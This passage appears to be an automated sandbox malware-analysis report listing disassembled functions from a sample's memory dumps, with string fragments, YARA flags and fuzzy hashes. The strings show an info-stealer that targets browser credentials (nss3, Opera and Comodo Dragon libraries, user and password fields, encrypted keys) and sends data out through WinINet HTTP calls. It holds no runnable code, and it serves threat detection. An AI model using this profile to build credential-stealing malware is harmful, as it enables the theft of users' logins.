                                  Function 000B1E50, Relevance: 12.7, Strings: 10, Instructions: 181COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "}$L$S$a$c$d_ke$encr$l$y$ypte
                                  • API String ID: 0-3767459862
                                  • Opcode ID: 4c6bafd81835e67cdc8a3eae33ebdd3373559b307070c08972b5002f65edfc8d
                                  • Instruction ID: ea5c2778b087d141f6953a1384970c6731c77074c5aba407302bdc1e7f6e40ab
                                  • Opcode Fuzzy Hash: 4c6bafd81835e67cdc8a3eae33ebdd3373559b307070c08972b5002f65edfc8d
                                  • Instruction Fuzzy Hash: E95160B1D10318AEDB60DFA89C45BEEB7F9AF48300F40416AF508E7242EBB55945CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B0853, Relevance: 11.5, Strings: 9, Instructions: 230COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: URL: $.$L: $L: $e$i$n$o$p
                                  • API String ID: 0-3025668702
                                  • Opcode ID: da034e895fd18ec192ea60bf268fcca83b12a78b35fdc87175bd85d915ce3803
                                  • Instruction ID: 66644098aaec299d3686027fb6f67ef2ff2c3f6ca7e4407d2110d1de8efc8800
                                  • Opcode Fuzzy Hash: da034e895fd18ec192ea60bf268fcca83b12a78b35fdc87175bd85d915ce3803
                                  • Instruction Fuzzy Hash: CD812EB1900308AFDB20DFA4CC81BEFB7F9EF44704F044529E519AB252E7B1A555CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B0860, Relevance: 11.5, Strings: 9, Instructions: 229COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: URL: $.$L: $L: $e$i$n$o$p
                                  • API String ID: 0-3025668702
                                  • Opcode ID: 9ddb18a872856f4c221e0ba63600c8ba8755dc245e705d23e5cb427cee786466
                                  • Instruction ID: cbf18203cea94e532ed8124cf784a9c5bc4ad557493e8d8cddf6b6586ba66ebb
                                  • Opcode Fuzzy Hash: 9ddb18a872856f4c221e0ba63600c8ba8755dc245e705d23e5cb427cee786466
                                  • Instruction Fuzzy Hash: 75811CB1900308AFDB20DFA4CC81BEFB7F9EF44704F044529E519AB252E7B1A945CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B1350, Relevance: 11.4, Strings: 9, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$N$e$e$n$o$r$y
                                  • API String ID: 0-157158463
                                  • Opcode ID: 39cd1a5ac2d306f7f1d8e0851c75e524d10f6041a92f2df489c2bb1cd57e7e7f
                                  • Instruction ID: 7684fae9d6d69e6da52db4aaeb42bf8377b4892f8aebc7af7575d7a5019c169a
                                  • Opcode Fuzzy Hash: 39cd1a5ac2d306f7f1d8e0851c75e524d10f6041a92f2df489c2bb1cd57e7e7f
                                  • Instruction Fuzzy Hash: 806151B1E0030CAFDB60DFA4D885BEEB7F9EF49700F004559E509E7641EB759A448BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A7B30, Relevance: 11.4, Strings: 9, Instructions: 119COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C$U$a$b$d$i$k$n$o
                                  • API String ID: 0-3121204512
                                  • Opcode ID: be6cb18e5eec7a021662cb67d95f7c97fa91f0ca95ca833c62488018b7729fed
                                  • Instruction ID: 4339f0dcea317344d38281af7e351bd4ec8707db8bc7687d192ddf8c5c132d3f
                                  • Opcode Fuzzy Hash: be6cb18e5eec7a021662cb67d95f7c97fa91f0ca95ca833c62488018b7729fed
                                  • Instruction Fuzzy Hash: 454161B190030CAFDB10EFA0DC45BEFB7B9EF45704F00851DE519A7242DBB569058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000842DC, Relevance: 10.4, Strings: 8, Instructions: 383COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: dc6d20832b1b39d4d3e1ef0e1bf0088f385c27fc1c01fde7cbb08d55fa20b8a2
                                  • Instruction ID: b12fbe1061bc1a2d8b723a96f120a41628e9a60adc973c45e98dcffa2501f3d2
                                  • Opcode Fuzzy Hash: dc6d20832b1b39d4d3e1ef0e1bf0088f385c27fc1c01fde7cbb08d55fa20b8a2
                                  • Instruction Fuzzy Hash: 6FC17070618A098FC798FB68D496AEAF3E1FF54300F914329948AC7256DF70EA45CBC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000842E2, Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: fcf9018c1be6966184a4ee4e363ac4f08b731027653b549db9160eebbf57608b
                                  • Instruction ID: f43b730276f561f5e70865d6a0107353887525da9ebf220bffecd509c77fc8be
                                  • Opcode Fuzzy Hash: fcf9018c1be6966184a4ee4e363ac4f08b731027653b549db9160eebbf57608b
                                  • Instruction Fuzzy Hash: 3DC16F70618A098FC798FF68D496AEAB3E1FB54300F914329948AC7256DF70EA45CBC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B2380, Relevance: 10.2, Strings: 8, Instructions: 231COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$P$U$U$e$l$s
                                  • API String ID: 0-522774390
                                  • Opcode ID: ac0d25abcfd4393355ebf2f7e750222578df8effce3e4044e92539265167ffdf
                                  • Instruction ID: fed126479b05b204a66b83015f28d38ce32b052e78c0aa75deaa679f5013f111
                                  • Opcode Fuzzy Hash: ac0d25abcfd4393355ebf2f7e750222578df8effce3e4044e92539265167ffdf
                                  • Instruction Fuzzy Hash: 5D912CB5A10308AFDB64DFA4C881BEEB7F9FF48300F14451DE515AB242EBB4A901CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA450, Relevance: 10.0, Strings: 8, Instructions: 48COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                  • API String ID: 0-4016285707
                                  • Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                  • Instruction ID: e7bb72b2cb33cc033b78697d7f52d2601c135b782394006f48f1221d0b57dec1
                                  • Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                  • Instruction Fuzzy Hash: 5901D7B2A05159AFCB04DF98D841DEB7BB9EB48210F158288FD48A7205D670ED108BE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA446, Relevance: 10.0, Strings: 8, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                  • API String ID: 0-4016285707
                                  • Opcode ID: 19164903e8fa277f2ce2d73383349ce6aef04be7a8b15cb151a7b2ff76e931fc
                                  • Instruction ID: 8d5522f759a1e58c199672c9cd49ffff951a602b6e8187ceebe241708a2a1e23
                                  • Opcode Fuzzy Hash: 19164903e8fa277f2ce2d73383349ce6aef04be7a8b15cb151a7b2ff76e931fc
                                  • Instruction Fuzzy Hash: 3A0117B2A04258AFCB04DF88D845DEF7BB8EF98310F158248FD48AB205D270ED108BA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA4D0, Relevance: 10.0, Strings: 8, Instructions: 42COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                  • API String ID: 0-2503632690
                                  • Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                  • Instruction ID: 9445366dacc9d196590a4157d19fd9bd889cd0f325a973f69e20b278adf0d11a
                                  • Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                  • Instruction Fuzzy Hash: D5014FB2905118AFCB10DF98D8419EF7BBCEB44210F158189FD08A7205D670EE10CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA4CF, Relevance: 10.0, Strings: 8, Instructions: 37COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                  • API String ID: 0-2503632690
                                  • Opcode ID: 036b394b54ad4d7c161d537527df5e563021667ab2b86da9fc87daf2db0228c1
                                  • Instruction ID: 883e034684b1ffbe7f5429db7c321782404fb2f1069876a9ee7bfb74940a46fb
                                  • Opcode Fuzzy Hash: 036b394b54ad4d7c161d537527df5e563021667ab2b86da9fc87daf2db0228c1
                                  • Instruction Fuzzy Hash: 6C016DB2905159AFCF10DF98C841EEF7BB8EF59210F158188FD09A7205D270EA10CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B7D6A, Relevance: 10.0, Strings: 8, Instructions: 35COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $ $ $auth$logi$n $pass$user
                                  • API String ID: 0-3936056649
                                  • Opcode ID: 40c6a09a4b8fbac48162e4eed7ed6214bb66719e6f8d14f48d8efab128930575
                                  • Instruction ID: 45f55eba98b977929e129be8704c45a2f8019521dffb3d3067589b39836c595f
                                  • Opcode Fuzzy Hash: 40c6a09a4b8fbac48162e4eed7ed6214bb66719e6f8d14f48d8efab128930575
                                  • Instruction Fuzzy Hash: 5CF0AF72820318A6DF10CF9A98416EFFFB8EF56350F145199D804AB252D3B14615CBD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085CC6, Relevance: 9.0, Strings: 7, Instructions: 293COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 6b92eb1aa766a92bc6c66d31c3b913f7d50a907dbfcbb04efdfad936ef228005
                                  • Instruction ID: 7e38cbcd966b1d5f5feeed6c80f691798be2b1c807dc3e35cd813ca71a063e58
                                  • Opcode Fuzzy Hash: 6b92eb1aa766a92bc6c66d31c3b913f7d50a907dbfcbb04efdfad936ef228005
                                  • Instruction Fuzzy Hash: 00A17070618B488FDB19EFA8D445BEEB7F1FB98300F40462EE48AD7252EF7095458789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085CD2, Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: b573ed857b762350397aae34e2f9aaad1298334114e586c20c9a60d900277d65
                                  • Instruction ID: 5b94a66324d8b990ce3396b305f4b2263c119c0a5036c48d3e8dfa57f7735a4a
                                  • Opcode Fuzzy Hash: b573ed857b762350397aae34e2f9aaad1298334114e586c20c9a60d900277d65
                                  • Instruction Fuzzy Hash: 19917F70618B488BDB29EF68D445BEEB7F1FF98300F40462EE48AD7252EF7095458789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA3D0, Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                  • API String ID: 0-1024195942
                                  • Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                  • Instruction ID: 744daf6e7bd5e0ad075093e2d1a465ae733f7246b8683485fb0a954a9fc18be2
                                  • Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                  • Instruction Fuzzy Hash: 4901E9B2A05158AFCB14DF99D941EEF77B8EB48310F154289BE08A7241D670EE11CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA3C5, Relevance: 8.8, Strings: 7, Instructions: 46COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                  • API String ID: 0-1024195942
                                  • Opcode ID: 824ec773f73248744c58c2153fdb47b6502f54b8605a04f2f635a1757c7c2c15
                                  • Instruction ID: b5c87028346b5c4d113b476d1e98169efb60167413ce6e93b04b0f64e6719131
                                  • Opcode Fuzzy Hash: 824ec773f73248744c58c2153fdb47b6502f54b8605a04f2f635a1757c7c2c15
                                  • Instruction Fuzzy Hash: DC01EDB2905159AFCB14DF98D945EEF77F9EF48310F154288FA58A7241D630EA10CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA540, Relevance: 8.8, Strings: 7, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                  • API String ID: 0-4188302782
                                  • Opcode ID: e827d5744429952d92f00aeb4ee0c9508320ca8a084f3a939a3bd2fe4213dc38
                                  • Instruction ID: 44d2aaf922405daca9e217ea64b4dd8dcab30ba1c6d0257bedbcae9f3cfc9005
                                  • Opcode Fuzzy Hash: e827d5744429952d92f00aeb4ee0c9508320ca8a084f3a939a3bd2fe4213dc38
                                  • Instruction Fuzzy Hash: 9A011DB2905118AFDB10DFD8D945AEB7BB8EB45210F144189ED48AB205E270EE10CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00086032, Relevance: 7.7, Strings: 6, Instructions: 203COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: +Q0$$.dll$cryp$dll$nss3$t32.
                                  • API String ID: 0-4170858970
                                  • Opcode ID: e13da1e1da10821326afd1be170254d05dcc205c28daeeb2be5b43f80e027b11
                                  • Instruction ID: 2aa8d025a6a0a59aea0443e0e1dfb7e753d48d74f15425cd7e7de060358fe1ec
                                  • Opcode Fuzzy Hash: e13da1e1da10821326afd1be170254d05dcc205c28daeeb2be5b43f80e027b11
                                  • Instruction Fuzzy Hash: D3616D30624F099FDB59EF68C0497DAB3E2FF18300F40462EA48AD7255EB75A954CBC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AF840, Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: f69a521eb55b1ca32e06d3941bc5a91e1205376e735f3a91f233aada2803425b
                                  • Instruction ID: a857af388b663d016779b92096cac42eccb371e73fda0edf0c9fe9bb92b4dbcd
                                  • Opcode Fuzzy Hash: f69a521eb55b1ca32e06d3941bc5a91e1205376e735f3a91f233aada2803425b
                                  • Instruction Fuzzy Hash: F751B4B1900309ABEB74DBE4CC45BFBB3F8EF05704F044569E50996582E7B4AA44CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000ACA70, Relevance: 7.6, Strings: 6, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: P$e$i$m$o$r
                                  • API String ID: 0-4274970381
                                  • Opcode ID: a040f3a01c89c286c07d3db6f74ffff15c8fcb7afdfdf7343b025b62eacfbc10
                                  • Instruction ID: 3f179ec13a9d5479e876bb658ceab0561faef8866cb6c9f7102c5756b71e6d24
                                  • Opcode Fuzzy Hash: a040f3a01c89c286c07d3db6f74ffff15c8fcb7afdfdf7343b025b62eacfbc10
                                  • Instruction Fuzzy Hash: 3431737195031C6BEB21DBA4DC42FEE777DEF48700F404199F509AA182EFB16B848BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AE125, Relevance: 7.6, Strings: 6, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$FBIMG$FBIMG$g$i$p
                                  • API String ID: 0-1737736949
                                  • Opcode ID: 797ac6da20ce1abd20a7ab22ec586c2abea6af2cef63b023beec731a01ba7814
                                  • Instruction ID: 828960f5621806b2a7a29f9257f7b9beac09153ce8fb26663a4f4e7a2f847d3a
                                  • Opcode Fuzzy Hash: 797ac6da20ce1abd20a7ab22ec586c2abea6af2cef63b023beec731a01ba7814
                                  • Instruction Fuzzy Hash: DE317E71940308ABDB50DFA8D841FEFBBF9FF89700F04441AE919AB281D7B55944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AE130, Relevance: 7.6, Strings: 6, Instructions: 91COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$FBIMG$FBIMG$g$i$p
                                  • API String ID: 0-1737736949
                                  • Opcode ID: 4cb00058f657d97277b6175baa5e96c59cb7ca6a811c9a23e0f4a48569ef5a87
                                  • Instruction ID: c89a7489b7229e937f9145b7d6cf5ab667a9e97dc11209843187974f7850fc71
                                  • Opcode Fuzzy Hash: 4cb00058f657d97277b6175baa5e96c59cb7ca6a811c9a23e0f4a48569ef5a87
                                  • Instruction Fuzzy Hash: 87318F71900308ABDB50DFA4D841FEFB7F9FF89700F04441AE918AB281D7B56944CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A36B0, Relevance: 7.6, Strings: 6, Instructions: 90COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 10$2008$2012$2016$7$8
                                  • API String ID: 0-783846285
                                  • Opcode ID: 62adeb6a7d309290b0dbea11493ed95148d74dd2305be32bdea17c2a6319db66
                                  • Instruction ID: f83abce3e84a9146c4f6b6d9070bb1e7c707a9c68f1ea35678a4611831a93a63
                                  • Opcode Fuzzy Hash: 62adeb6a7d309290b0dbea11493ed95148d74dd2305be32bdea17c2a6319db66
                                  • Instruction Fuzzy Hash: 5A218CE190121D6AEB50EAA09C46BFE77ACAF15304F440159FD08AA287F3B55709CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B6C9B, Relevance: 7.6, Strings: 6, Instructions: 80COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $: $: $Host$Host: $Unknown
                                  • API String ID: 0-3527920956
                                  • Opcode ID: e68e6173da14ea6b03c1afd629add3566754bf07bbdae7e57bd3283a980bcce4
                                  • Instruction ID: fdd521d66819e19178b8665cd0da6ee3f685c725134e78c9608d85d37e007e1c
                                  • Opcode Fuzzy Hash: e68e6173da14ea6b03c1afd629add3566754bf07bbdae7e57bd3283a980bcce4
                                  • Instruction Fuzzy Hash: 16215C76904209ABDB11DF98CC81FEBB7A8EF84700F048569F9199B246DBB5A604C7F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B6CA0, Relevance: 7.6, Strings: 6, Instructions: 80COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $: $: $Host$Host: $Unknown
                                  • API String ID: 0-3527920956
                                  • Opcode ID: c7850e5d2e0d235686c8bb30dbe0a219e33032b48e47b1bc569c74d1673d0554
                                  • Instruction ID: 54768be9b235c869cc08bc93af6bc4f48c95867c97d07222fceaf385be1690dd
                                  • Opcode Fuzzy Hash: c7850e5d2e0d235686c8bb30dbe0a219e33032b48e47b1bc569c74d1673d0554
                                  • Instruction Fuzzy Hash: 7D215376904308ABDB10DF94CC81FEB77A8EF85700F044569F9199B246DBB5A644C7F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA360, Relevance: 7.5, Strings: 6, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                  • API String ID: 0-3155091674
                                  • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                  • Instruction ID: 487ef5eaff419ddfd9c07d4d7f19f4e027a2de09f168cb7f9a9a2a7815e9a27c
                                  • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                  • Instruction Fuzzy Hash: DAF019B2A01118AF9B14DF98DC419FBB7BCEF48310B048689BE1897301D635AE508BE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA358, Relevance: 7.5, Strings: 6, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                  • API String ID: 0-3155091674
                                  • Opcode ID: d1e555666d3aa37e72671e4b0c273ba5b4360f7fe234b214283c29c446cf18be
                                  • Instruction ID: fe5d5e5b103d41fc7533d1c731b21020694fb661319642c8129e5fcbac91f79f
                                  • Opcode Fuzzy Hash: d1e555666d3aa37e72671e4b0c273ba5b4360f7fe234b214283c29c446cf18be
                                  • Instruction Fuzzy Hash: 24F081B2901115AFCB54CF88D8419EFBBB9AF45310B08814DEE18A7202D234AA50CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AF83D, Relevance: 7.5, Strings: 6, Instructions: 34COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: 8f5b15daade21a5f080db24047168b2e148ef6823bdace1f058269fc04a41287
                                  • Instruction ID: 1d66e667e946ecdec4529dfcc5b173219746b546a1a1fb4bf994e99674e8bac3
                                  • Opcode Fuzzy Hash: 8f5b15daade21a5f080db24047168b2e148ef6823bdace1f058269fc04a41287
                                  • Instruction Fuzzy Hash: FBF0AF71D10208ABDB20DFE888056EFBFB5FF46354F00811AA8187B600E7B60A098BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA5B0, Relevance: 7.5, Strings: 6, Instructions: 34COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                  • API String ID: 0-4067651292
                                  • Opcode ID: 0e14ef5a2133572a007edb29d6b0d1ac0ce457eeba957283f8b59f320c40486f
                                  • Instruction ID: 3776de238a799eabed8ac58502e294a14344a4c42fc59607c524217eb20d3997
                                  • Opcode Fuzzy Hash: 0e14ef5a2133572a007edb29d6b0d1ac0ce457eeba957283f8b59f320c40486f
                                  • Instruction Fuzzy Hash: 5DF03672D05118AF8B10DFD9D9459EFBBB8EB45310F158189ED4867201D6719B10CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BA5A6, Relevance: 7.5, Strings: 6, Instructions: 31COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                  • API String ID: 0-4067651292
                                  • Opcode ID: 9ef9310dbcb5dce07b1a97d0b5638b703b0aa613aacdafe88ee858e5d3c76d39
                                  • Instruction ID: f288f92ce04a495de3dc77b67df359fff041ed8920e7c09272b9e25ad5730a11
                                  • Opcode Fuzzy Hash: 9ef9310dbcb5dce07b1a97d0b5638b703b0aa613aacdafe88ee858e5d3c76d39
                                  • Instruction Fuzzy Hash: AFF062B6D01119AF8B00DF99D9455DEBB78FB05310B118189E9447B202D670AB40CBD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B0570, Relevance: 6.5, Strings: 5, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L: $guid$guid$hostname$httpRealm
                                  • API String ID: 0-1857978454
                                  • Opcode ID: c2aa1e1ecd2007c323d5ae8114c62d9ea82b76c4751e21a2193a172b1dc2cbf6
                                  • Instruction ID: 3768c6c0390890815c8af93e12c3b200f34bf1edef8b6271defd2cb97e915379
